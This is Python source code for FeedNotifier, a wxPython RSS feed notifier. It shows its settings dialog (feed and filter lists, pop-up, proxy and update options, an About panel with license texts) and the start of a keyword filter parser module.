self.apply()
event.Skip()
def on_apply(self, event):
self.apply()
self.apply_button.Disable()
class FeedsList(wx.ListCtrl):
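    # Virtual list control: rows are supplied on demand through
    # OnGetItemText/OnGetItemImage instead of being stored in the widget.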
def __init__(self, parent, dialog):
style = wx.LC_REPORT|wx.LC_VIRTUAL#|wx.LC_HRULES|wx.LC_VRULES
super(FeedsList, self).__init__(parent, -1, style=style)
self.dialog = dialog
self.model = dialog.model
images = wx.ImageList(16, 16, True)
images.AddWithColourMask(wx.Bitmap('icons/unchecked.png'), wx.WHITE)
images.AddWithColourMask(wx.Bitmap('icons/checked.png'), wx.WHITE)
self.AssignImageList(images, wx.IMAGE_LIST_SMALL)
self.InsertColumn(INDEX_ENABLED, 'On')
self.InsertColumn(INDEX_URL, 'Feed URL')
self.InsertColumn(INDEX_TITLE, 'Feed Title')
self.InsertColumn(INDEX_INTERVAL, 'Interval')
self.InsertColumn(INDEX_ITEM_COUNT, 'Items')
self.InsertColumn(INDEX_CLICKS, 'Clicks')
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.Bind(wx.EVT_LIST_COL_CLICK, self.on_col_click)
self.update()
self.SetColumnWidth(INDEX_ENABLED, 32)
self.SetColumnWidth(INDEX_URL, 165)
self.SetColumnWidth(INDEX_TITLE, 165)
self.SetColumnWidth(INDEX_INTERVAL, 75)
self.SetColumnWidth(INDEX_ITEM_COUNT, -2)
self.SetColumnWidth(INDEX_CLICKS, -2)
def update(self):
self.SetItemCount(len(self.model.feeds))
self.Refresh()
def on_col_click(self, event):
column = event.GetColumn()
self.model.sort_feeds(column)
self.update()
def on_left_down(self, event):
index, flags = self.HitTest(event.GetPosition())
if index >= 0 and (flags & wx.LIST_HITTEST_ONITEMICON):
self.toggle(index)
event.Skip()
def toggle(self, index):
feed = self.model.feeds[index]
feed.enabled = not feed.enabled
self.RefreshItem(index)
self.dialog.on_change()
def OnGetItemImage(self, index):
feed = self.model.feeds[index]
return 1 if feed.enabled else 0
def OnGetItemText(self, index, column):
feed = self.model.feeds[index]
if column == INDEX_URL:
return feed.url
if column == INDEX_TITLE:
return feed.title
if column == INDEX_INTERVAL:
return util.split_time_str(feed.interval)
if column == INDEX_CLICKS:
return str(feed.clicks) if feed.clicks else ''
if column == INDEX_ITEM_COUNT:
return str(feed.item_count) if feed.item_count else ''
return ''
class FiltersList(wx.ListCtrl):
def __init__(self, parent, dialog):
style = wx.LC_REPORT|wx.LC_VIRTUAL#|wx.LC_HRULES|wx.LC_VRULES
super(FiltersList, self).__init__(parent, -1, style=style)
self.dialog = dialog
self.model = dialog.model
images = wx.ImageList(16, 16, True)
images.AddWithColourMask(wx.Bitmap('icons/unchecked.png'), wx.WHITE)
images.AddWithColourMask(wx.Bitmap('icons/checked.png'), wx.WHITE)
self.AssignImageList(images, wx.IMAGE_LIST_SMALL)
self.InsertColumn(INDEX_ENABLED, 'On')
self.InsertColumn(INDEX_RULES, 'Filter Rules')
self.InsertColumn(INDEX_FEEDS, 'Feeds')
self.InsertColumn(INDEX_IN, 'In')
self.InsertColumn(INDEX_OUT, 'Out')
self.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.Bind(wx.EVT_LIST_COL_CLICK, self.on_col_click)
self.update()
self.SetColumnWidth(INDEX_ENABLED, 32)
self.SetColumnWidth(INDEX_RULES, 200)
self.SetColumnWidth(INDEX_FEEDS, 64)
self.SetColumnWidth(INDEX_IN, 64)
self.SetColumnWidth(INDEX_OUT, 64)
def update(self):
self.SetItemCount(len(self.model.filters))
self.Refresh()
def on_col_click(self, event):
column = event.GetColumn()
self.model.sort_filters(column)
self.update()
def on_left_down(self, event):
index, flags = self.HitTest(event.GetPosition())
if index >= 0 and (flags & wx.LIST_HITTEST_ONITEMICON):
self.toggle(index)
event.Skip()
def toggle(self, index):
filter = self.model.filters[index]
filter.enabled = not filter.enabled
self.RefreshItem(index)
self.dialog.on_change()
def OnGetItemImage(self, index):
filter = self.model.filters[index]
return 1 if filter.enabled else 0
def OnGetItemText(self, index, column):
filter = self.model.filters[index]
if column == INDEX_RULES:
return filter.code.replace('\n', ' ')
if column == INDEX_FEEDS:
return str(len(filter.feeds)) if filter.feeds else 'All'
if column == INDEX_IN:
return str(filter.inputs)
if column == INDEX_OUT:
return str(filter.outputs)
return ''
class FeedsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(FeedsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
list = FeedsList(panel, self.dialog)
list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_edit)
list.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.list = list
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(list, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(buttons, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_buttons(self, parent):
new = wx.Button(parent, -1, 'Add...')
#import_feeds = wx.Button(parent, -1, 'Import...')
edit = wx.Button(parent, -1, 'Edit...')
delete = wx.Button(parent, -1, 'Delete')
new.Bind(wx.EVT_BUTTON, self.on_new)
edit.Bind(wx.EVT_BUTTON, self.on_edit)
delete.Bind(wx.EVT_BUTTON, self.on_delete)
edit.Disable()
delete.Disable()
self.edit = edit
self.delete = delete
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(new)
sizer.AddSpacer(8)
#sizer.Add(import_feeds)
#sizer.AddSpacer(8)
sizer.Add(edit)
sizer.AddSpacer(8)
sizer.Add(delete)
sizer.AddStretchSpacer(1)
return sizer
def update(self):
self.list.update()
self.update_buttons()
self.dialog.on_change()
def on_selection(self, event):
event.Skip()
self.update_buttons()
def update_buttons(self):
count = self.list.GetSelectedItemCount()
self.edit.Enable(count == 1)
self.delete.Enable(count > 0)
def on_left_down(self, event):
index, flags = self.list.HitTest(event.GetPosition())
if flags & wx.LIST_HITTEST_NOWHERE:
self.edit.Disable()
self.delete.Disable()
event.Skip()
def on_edit(self, event):
count = self.list.GetSelectedItemCount()
if count != 1:
return
index = self.list.GetNextItem(-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
feed = self.model.feeds[index]
window = EditFeedDialog(self, feed)
window.CenterOnScreen()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_OK:
self.update()
def on_new(self, event):
feed = AddFeedDialog.show_wizard(self)
if feed:
self.model.feeds.append(feed)
self.update()
def on_delete(self, event):
dialog = wx.MessageDialog(self.dialog, 'Are you sure you want to delete the selected feed(s)?', 'Confirm Delete', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result != wx.ID_YES:
return
feeds = []
index = -1
while True:
index = self.list.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
feed = self.model.feeds[index]
feeds.append(feed)
if feeds:
for feed in feeds:
self.model.feeds.remove(feed)
self.update()
class FiltersPanel(wx.Panel):
def __init__(self, parent, dialog):
super(FiltersPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
list = FiltersList(panel, self.dialog)
list.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.on_selection)
list.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_edit)
list.Bind(wx.EVT_LEFT_DOWN, self.on_left_down)
self.list = list
buttons = self.create_buttons(panel)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(list, 1, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(buttons, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_buttons(self, parent):
new = wx.Button(parent, -1, 'Add...')
edit = wx.Button(parent, -1, 'Edit...')
delete = wx.Button(parent, -1, 'Delete')
new.Bind(wx.EVT_BUTTON, self.on_new)
edit.Bind(wx.EVT_BUTTON, self.on_edit)
delete.Bind(wx.EVT_BUTTON, self.on_delete)
edit.Disable()
delete.Disable()
self.edit = edit
self.delete = delete
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(new)
sizer.AddSpacer(8)
sizer.Add(edit)
sizer.AddSpacer(8)
sizer.Add(delete)
sizer.AddStretchSpacer(1)
return sizer
def update(self):
self.list.update()
self.update_buttons()
self.dialog.on_change()
def on_selection(self, event):
event.Skip()
self.update_buttons()
def update_buttons(self):
count = self.list.GetSelectedItemCount()
self.edit.Enable(count == 1)
self.delete.Enable(count > 0)
def on_left_down(self, event):
index, flags = self.list.HitTest(event.GetPosition())
if flags & wx.LIST_HITTEST_NOWHERE:
self.edit.Disable()
self.delete.Disable()
event.Skip()
def on_edit(self, event):
count = self.list.GetSelectedItemCount()
if count != 1:
return
index = self.list.GetNextItem(-1, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
filter = self.model.filters[index]
window = EditFilterDialog(self, self.model, filter)
window.Center()
result = window.ShowModal()
window.Destroy()
if result == wx.ID_OK:
self.update()
def on_new(self, event):
window = EditFilterDialog(self, self.model)
window.Center()
result = window.ShowModal()
filter = window.filter
window.Destroy()
if result == wx.ID_OK:
self.model.filters.append(filter)
self.update()
def on_delete(self, event):
dialog = wx.MessageDialog(self.dialog, 'Are you sure you want to delete the selected filter(s)?', 'Confirm Delete', wx.YES_NO|wx.NO_DEFAULT|wx.ICON_QUESTION)
result = dialog.ShowModal()
dialog.Destroy()
if result != wx.ID_YES:
return
filters = []
index = -1
while True:
index = self.list.GetNextItem(index, wx.LIST_NEXT_ALL, wx.LIST_STATE_SELECTED)
if index < 0:
break
filter = self.model.filters[index]
filters.append(filter)
if filters:
for filter in filters:
self.model.filters.remove(filter)
self.update()
class PopupsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(PopupsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.update_controls()
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
behavior = self.create_behavior(panel)
appearance = self.create_appearance(panel)
content = self.create_content(panel)
sizer.Add(behavior, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(appearance, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(content, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_appearance(self, parent):
box = wx.StaticBox(parent, -1, 'Appearance')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
labels = ['Position', 'Width', 'Monitor', 'Transparency', 'Border', 'Border Size']
positions = [(0, 0), (0, 3), (1, 0), (1, 3), (2, 0), (2, 3)]
for label, position in zip(labels, positions):
text = wx.StaticText(parent, -1, label)
grid.Add(text, position, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
position = wx.Choice(parent, -1)
position.Append('Upper Left', (-1, -1))
position.Append('Upper Right', (1, -1))
position.Append('Lower Left', (-1, 1))
position.Append('Lower Right', (1, 1))
position.Append('Center', (0, 0))
width = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
transparency = wx.SpinCtrl(parent, -1, '0', min=0, max=255, size=(64, -1))
display = wx.Choice(parent, -1)
for index in range(wx.Display_GetCount()):
display.Append('Monitor #%d' % (index + 1), index)
border_color = wx.Button(parent, -1)
border_size = wx.SpinCtrl(parent, -1, '1', min=0, max=9, size=(64, -1))
grid.Add(position, (0, 1), flag=wx.EXPAND)
grid.Add(display, (1, 1), flag=wx.EXPAND)
grid.Add(width, (0, 4))
grid.Add(transparency, (1, 4))
grid.Add(border_color, (2, 1), flag=wx.EXPAND)
grid.Add(border_size, (2, 4))
text = wx.StaticText(parent, -1, 'pixels')
grid.Add(text, (0, 5), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, '[0-255], 255=opaque')
grid.Add(text, (1, 5), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'pixels')
grid.Add(text, (2, 5), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
position.Bind(wx.EVT_CHOICE, self.on_change)
display.Bind(wx.EVT_CHOICE, self.on_change)
width.Bind(wx.EVT_SPINCTRL, self.on_change)
transparency.Bind(wx.EVT_SPINCTRL, self.on_change)
border_size.Bind(wx.EVT_SPINCTRL, self.on_change)
border_color.Bind(wx.EVT_BUTTON, self.on_border_color)
self.position = position
self.display = display
self.width = width
self.transparency = transparency
self.border_color = border_color
self.border_size = border_size
return sizer
def create_behavior(self, parent):
box = wx.StaticBox(parent, -1, 'Behavior')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Duration')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'seconds')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
duration = wx.SpinCtrl(parent, -1, '1', min=1, max=60, size=(64, -1))
auto = wx.CheckBox(parent, -1, 'Infinite duration')
sound = wx.CheckBox(parent, -1, 'Sound notification')
hover = wx.CheckBox(parent, -1, 'Wait if hovering')
top = wx.CheckBox(parent, -1, 'Stay on top')
grid.Add(duration, (0, 1))
grid.Add(auto, (0, 4), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(sound, (1, 4), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(hover, (0, 6), flag=wx.ALIGN_CENTER_VERTICAL)
grid.Add(top, (1, 6), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
duration.Bind(wx.EVT_SPINCTRL, self.on_change)
auto.Bind(wx.EVT_CHECKBOX, self.on_change)
sound.Bind(wx.EVT_CHECKBOX, self.on_change)
hover.Bind(wx.EVT_CHECKBOX, self.on_change)
top.Bind(wx.EVT_CHECKBOX, self.on_change)
self.duration = duration
self.auto = auto
self.sound = sound
self.hover = hover
self.top = top
return sizer
def create_content(self, parent):
box = wx.StaticBox(parent, -1, 'Content')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Max. Title Length')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'Max. Body Length')
grid.Add(text, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'characters')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'characters')
grid.Add(text, (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
title = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
body = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
grid.Add(title, (0, 1))
grid.Add(body, (1, 1))
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
title.Bind(wx.EVT_SPINCTRL, self.on_change)
body.Bind(wx.EVT_SPINCTRL, self.on_change)
self.title = title
self.body = body
return sizer
def update_controls(self):
model = self.model
self.width.SetValue(model.POPUP_WIDTH)
self.transparency.SetValue(model.POPUP_TRANSPARENCY)
self.duration.SetValue(model.POPUP_DURATION)
self.auto.SetValue(not model.POPUP_AUTO_PLAY)
self.sound.SetValue(model.PLAY_SOUND)
self.hover.SetValue(model.POPUP_WAIT_ON_HOVER)
self.top.SetValue(model.POPUP_STAY_ON_TOP)
self.title.SetValue(model.POPUP_TITLE_LENGTH)
self.body.SetValue(model.POPUP_BODY_LENGTH)
util.select_choice(self.position, model.POPUP_POSITION)
util.select_choice(self.display, model.POPUP_DISPLAY)
self.border_color.SetBackgroundColour(wx.Color(*settings.POPUP_BORDER_COLOR))
self.border_size.SetValue(model.POPUP_BORDER_SIZE)
def update_model(self):
model = self.model
model.POPUP_WIDTH = self.width.GetValue()
model.POPUP_TRANSPARENCY = self.transparency.GetValue()
model.POPUP_DURATION = self.duration.GetValue()
model.POPUP_TITLE_LENGTH = self.title.GetValue()
model.POPUP_BODY_LENGTH = self.body.GetValue()
model.POPUP_AUTO_PLAY = not self.auto.GetValue()
model.POPUP_WAIT_ON_HOVER = self.hover.GetValue()
model.POPUP_STAY_ON_TOP = self.top.GetValue()
model.PLAY_SOUND = self.sound.GetValue()
model.POPUP_POSITION = self.position.GetClientData(self.position.GetSelection())
model.POPUP_DISPLAY = self.display.GetClientData(self.display.GetSelection())
model.POPUP_BORDER_SIZE = self.border_size.GetValue()
color = self.border_color.GetBackgroundColour()
model.POPUP_BORDER_COLOR = (color.Red(), color.Green(), color.Blue())
def on_border_color(self, event):
data = wx.ColourData()
data.SetColour(self.border_color.GetBackgroundColour())
dialog = wx.ColourDialog(self, data)
if dialog.ShowModal() == wx.ID_OK:
self.border_color.SetBackgroundColour(dialog.GetColourData().GetColour())
self.on_change(event)
def on_change(self, event):
self.dialog.on_change()
event.Skip()
class OptionsPanel(wx.Panel):
def __init__(self, parent, dialog):
super(OptionsPanel, self).__init__(parent, -1)
self.dialog = dialog
self.model = dialog.model
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
self.update_controls()
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
general = self.create_general(panel)
caching = self.create_caching(panel)
proxy = self.create_proxy(panel)
sizer.Add(general, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(caching, 0, wx.EXPAND)
sizer.AddSpacer(8)
sizer.Add(proxy, 0, wx.EXPAND)
panel.SetSizerAndFit(sizer)
return panel
def create_general(self, parent):
box = wx.StaticBox(parent, -1, 'General')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
idle = wx.CheckBox(parent, -1, "Don't check feeds if I've been idle for")
grid.Add(idle, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
text = wx.StaticText(parent, -1, 'seconds')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
timeout = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
grid.Add(timeout, (0, 1))
auto_update = wx.CheckBox(parent, -1, 'Check for software updates automatically')
grid.Add(auto_update, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL)
check_now = wx.Button(parent, -1, 'Check Now')
grid.Add(check_now, (1, 1), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
timeout.Bind(wx.EVT_SPINCTRL, self.on_change)
idle.Bind(wx.EVT_CHECKBOX, self.on_change)
auto_update.Bind(wx.EVT_CHECKBOX, self.on_change)
check_now.Bind(wx.EVT_BUTTON, self.on_check_now)
self.idle = idle
self.timeout = timeout
self.auto_update = auto_update
self.check_now = check_now
return sizer
def create_caching(self, parent):
box = wx.StaticBox(parent, -1, 'Caching')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
text = wx.StaticText(parent, -1, 'Pop-up History')
grid.Add(text, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
#text = wx.StaticText(parent, -1, 'Item Cache')
#grid.Add(text, (1, 0), flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
text = wx.StaticText(parent, -1, 'days')
grid.Add(text, (0, 2), flag=wx.ALIGN_CENTER_VERTICAL)
#text = wx.StaticText(parent, -1, 'items per feed')
#grid.Add(text, (1, 2), flag=wx.ALIGN_CENTER_VERTICAL)
item = wx.SpinCtrl(parent, -1, '1', min=1, max=365, size=(64, -1))
grid.Add(item, (0, 1))
#feed = wx.SpinCtrl(parent, -1, '1', min=1, max=9999, size=(64, -1))
#grid.Add(feed, (1, 1))
clear_item = wx.Button(parent, -1, 'Clear')
grid.Add(clear_item, (0, 3))
#clear_feed = wx.Button(parent, -1, 'Clear')
#grid.Add(clear_feed, (1, 3))
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
item.Bind(wx.EVT_SPINCTRL, self.on_change)
#feed.Bind(wx.EVT_SPINCTRL, self.on_change)
clear_item.Bind(wx.EVT_BUTTON, self.on_clear_item)
#clear_feed.Bind(wx.EVT_BUTTON, self.on_clear_feed)
self.item = item
#self.feed = feed
self.clear_item = clear_item
#self.clear_feed = clear_feed
return sizer
def create_proxy(self, parent):
box = wx.StaticBox(parent, -1, 'Proxy')
sizer = wx.StaticBoxSizer(box, wx.VERTICAL)
grid = wx.GridBagSizer(8, 8)
use_proxy = wx.CheckBox(parent, -1, 'Use a proxy server')
grid.Add(use_proxy, (0, 0), flag=wx.ALIGN_CENTER_VERTICAL)
proxy_url = wx.TextCtrl(parent, -1, style=wx.TE_PASSWORD)
grid.Add(proxy_url, (1, 0), flag=wx.EXPAND)
text = wx.StaticText(parent, -1, 'Format: http://<username>:<password>@<proxyserver>:<proxyport>\nLeave blank to use Windows proxy settings.')
grid.Add(text, (2, 0), flag=wx.ALIGN_CENTER_VERTICAL)
sizer.Add(grid, 1, wx.EXPAND|wx.ALL, 8)
use_proxy.Bind(wx.EVT_CHECKBOX, self.on_change)
proxy_url.Bind(wx.EVT_TEXT, self.on_change)
self.use_proxy = use_proxy
self.proxy_url = proxy_url
return sizer
def update_controls(self):
model = self.model
self.idle.SetValue(model.DISABLE_WHEN_IDLE)
self.timeout.SetValue(model.USER_IDLE_TIMEOUT)
self.auto_update.SetValue(model.CHECK_FOR_UPDATES)
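# ITEM_CACHE_AGE is stored in seconds; the spin control shows whole days.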
one_day = 60 * 60 * 24
self.item.SetValue(model.ITEM_CACHE_AGE / one_day)
self.use_proxy.SetValue(model.USE_PROXY)
self.proxy_url.ChangeValue(util.decode_password(model.PROXY_URL) or '')
self.enable_controls()
def update_model(self):
model = self.model
model.DISABLE_WHEN_IDLE = self.idle.GetValue()
model.USER_IDLE_TIMEOUT = self.timeout.GetValue()
model.CHECK_FOR_UPDATES = self.auto_update.GetValue()
one_day = 60 * 60 * 24
model.ITEM_CACHE_AGE = self.item.GetValue() * one_day
model.USE_PROXY = self.use_proxy.GetValue()
model.PROXY_URL = util.encode_password(self.proxy_url.GetValue())
def enable_controls(self):
self.timeout.Enable(self.idle.GetValue())
self.proxy_url.Enable(self.use_proxy.GetValue())
def on_change(self, event):
self.enable_controls()
self.dialog.on_change()
event.Skip()
def on_clear_item(self, event):
self.model.controller.manager.clear_item_history()
self.clear_item.Disable()
def on_clear_feed(self, event):
self.model.controller.manager.clear_feed_cache()
self.clear_feed.Disable()
def on_check_now(self, event):
self.check_now.Disable()
self.model.controller.check_for_updates()
class AboutPanel(wx.Panel):
def __init__(self, parent):
super(AboutPanel, self).__init__(parent, -1)
panel = self.create_panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
line = wx.StaticLine(self, -1)
sizer.Add(line, 0, wx.EXPAND)
sizer.Add(panel, 1, wx.EXPAND|wx.ALL, 8)
credits = '''
%s %s :: Copyright (c) 2009-2013, <NAME>
16x16px icons in this application are from the Silk Icon set provided by Mark James under a Creative Commons Attribution 2.5 License. http://www.famfamfam.com/lab/icons/silk/
Third-party components of this software include the following:
* Python 2.6 - http://www.python.org/
* wxPython 2.8.10 - http://www.wxpython.org/
* Universal Feed Parser - http://www.feedparser.org/
* PLY 3.3 - http://www.dabeaz.com/ply/
* py2exe 0.6.9 - http://www.py2exe.org/
* Inno Setup - http://www.jrsoftware.org/isinfo.php
Universal Feed Parser, a component of this software, requires that the following text be included in the distribution of this application:
Copyright (c) 2002-2005, <NAME>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
PLY 3.3 (Python Lex-Yacc), a component of this software, requires that the following text be included in the distribution of this application:
Copyright (C) 2001-2009,
<NAME> (Dabeaz LLC)
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the David Beazley or Dabeaz LLC may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
''' % (settings.APP_NAME, settings.APP_VERSION)
credits = '\n'.join(line.strip() for line in credits.strip().split('\n'))
text = wx.TextCtrl(self, -1, credits, style=wx.TE_MULTILINE|wx.TE_READONLY)
text.SetBackgroundColour(self.GetBackgroundColour())
sizer.Add(text, 0, wx.EXPAND|wx.ALL&~wx.TOP, 8)
self.SetSizerAndFit(sizer)
def create_panel(self, parent):
panel = wx.Panel(parent, -1, style=wx.BORDER_SUNKEN)
panel.SetBackgroundColour(wx.WHITE)
sizer = wx.BoxSizer(wx.VERTICAL)
bitmap = wx.StaticBitmap(panel, -1, wx.Bitmap('icons/about.png'))
sizer.AddStretchSpacer(1)
sizer.Add(bitmap, 0, wx.ALIGN_CENTER_HORIZONTAL)
sizer.AddStretchSpacer(1)
panel.SetSizerAndFit(sizer)
return panel
|
yabhinav/FeedNotifier | filters.py | <filename>filters.py
# Keyword Filter Parser
EXCLUDE = 0
INCLUDE = 1
ALL = 0xf
TITLE = 1
LINK = 2
AUTHOR = 4
CONTENT = 8
TYPES = {
None: INCLUDE,
'+': INCLUDE,
'-': EXCLUDE,
}
QUALIFIERS = {
None: ALL,
'title:': TITLE,
'link:': LINK,
'author:': AUTHOR,
'content:': CONTENT,
}
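# Field qualifiers are bit flags, so ALL (0xf) selects every field at once
# and Rule.evaluate can test membership with a bitwise AND.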
TYPE_STR = {
EXCLUDE: '-',
INCLUDE: '+',
}
QUALIFIER_STR = {
ALL: 'all',
TITLE: 'title',
LINK: 'link',
AUTHOR: 'author',
CONTENT: 'content',
}
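# A Rule tests a single word against the item fields selected by its
# qualifier bitmask; its type decides whether a match means include (+)
# or exclude (-).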
class Rule(object):
def __init__(self, type, qualifier, word):
self.type = TYPES.get(type, type)
self.qualifier = QUALIFIERS.get(qualifier, qualifier)
self.word = word
def evaluate(self, item, ignore_case=True, whole_word=True):
strings = []
if self.qualifier & TITLE:
strings.append(item.title)
if self.qualifier & LINK:
